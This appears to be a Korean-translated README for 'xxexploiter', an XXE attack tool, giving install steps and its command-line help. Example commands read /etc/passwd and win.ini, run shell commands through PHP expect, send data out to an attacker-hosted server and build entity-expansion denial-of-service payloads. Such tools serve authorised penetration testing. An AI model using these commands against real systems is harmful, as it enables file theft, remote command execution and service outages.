
XXE 취약점 공격 도구

XML 페이로드를 생성하고, 필요한 DTD를 제공하거나 데이터 유출을 수행하기 위해 자동으로 서버를 시작합니다.
# node와 npm이 아직 없다면 먼저 설치하세요
npm install -g xxexploiter
이것은 TypeScript로 작성된 간단한 Node 애플리케이션입니다. 따라서 다른 앱과 동일한 방식으로 빌드할 수 있습니다. (node와 npm을 먼저 설치하세요, 아직 없다면)
npm install
npm run build
# 'npm build'가 성공하려면 npm install typescript -g가 필요할 수 있습니다
앱을 실행하는 방법은 세 가지가 있습니다:
npm start [args]
node dist/index.js [args]
npm link # 이제 xxexploiter라고만 입력하면 됩니다
또는 시스템에 설치할 수도 있습니다:
npm link
Usage: xxexploiter [command] [options]
Commands:
xxexploiter file [file_to_read] Use XXE to do a request
xxexploiter request [URL] Use XXE to do a request
xxexploiter expect [command] Use XXE to execute a command through PHP's expect
xxexploiter xee [expantions] Generate a huge content by resolving entities
Fuzzing Specific Options
-w, --wordlist Path to a wordlist to be used with the fuzz command. Use {{FUZZ}} placeholder in the command arg
for the magic.
-y, --success-string String to search for a success response in the requests. Not usefull for blind attacks
-n, --error-string String to search for an error response in the request. Not usefull for blind attacks
Options:
--version Show version number [boolean]
-s, --server Server address for OOB and DTD
-p, --port Server port for OOB and DTDs. Default: 7777
-t, --template path to an XML template where to inject payload
-m, --mode Extraction Mode: xml, oob, cdata. Default: xml
-e, --encode Extraction Encoding: none, phpbase64. Default: none
-o, --output Output for the XML payload file. Default is to console
-x Use a request to automatically send the xml file
-X, --request-output Output the response from -x option. If not defined goes to stdout
--verbose Enable some messages help for understanding whats happening
--doctype Specify the name of the doctype to be injected. Default is xxexploiter
-h, --help Show help [boolean]
Examples:
xxexploiter expect ls
xxexploiter -s 127.0.0.1 expect ls -e phpbase64 -m oob -o output.xml
xxexploiter -s 127.0.0.1 file /c/windows/win.ini -t xmltemplate.xml -m oob
xxexploiter xee 900000000 -o output.xml
xxexploiter file /etc/passwd -x request.txt -t template.xml
xxexploiter file /root/{FUZZ} -w wordlist.txt -n "not found" -x request.txt
Extra Info:
- When using the xml or cdata modes, add the placeholder '{{XXE}}' in the field where you want the entity content to
be injected
- When specifiying file paths for windows use forward slash.
- OOB: Out Of Bound: You can use this option to send the data processed by the xml parser, to your local webserver.
Usefull with blind attacks
- When using XML mode, it may break the XML parsing if XML reserved characters are loaded, so you may want to use
cdata
- When using the request option, you can specify the placeholder to inject the payload with {{XXE}} or {{XXE_B64}}
- When fuzzing you can add the {{FUZZ}} keyword in the main command argument.
- You can specify a string to filter successfull requests when fuzzing, either by supplying an expected error string,
or an expected success string
OOB 또는 CDATA 모드를 선택하면 XXExploiter가 포함할 DTD를 생성하고 이를 호스팅할 서버를 시작합니다. 이러한 옵션을 사용할 경우 서버 주소를 설정해야 합니다.
XML 본문에 콘텐츠를 포함할 경우 '<'와 같은 XML 제한 문자로 인해 파싱이 깨질 수 있으므로 CDATA 또는 PHP의 base64encode를 사용하세요.
대부분의 언어는 엔티티 확장 횟수나 확장된 콘텐츠의 총 길이를 제한하므로, 대상과 동일한 조건에서 먼저 자신의 머신에서 XEE를 테스트하세요.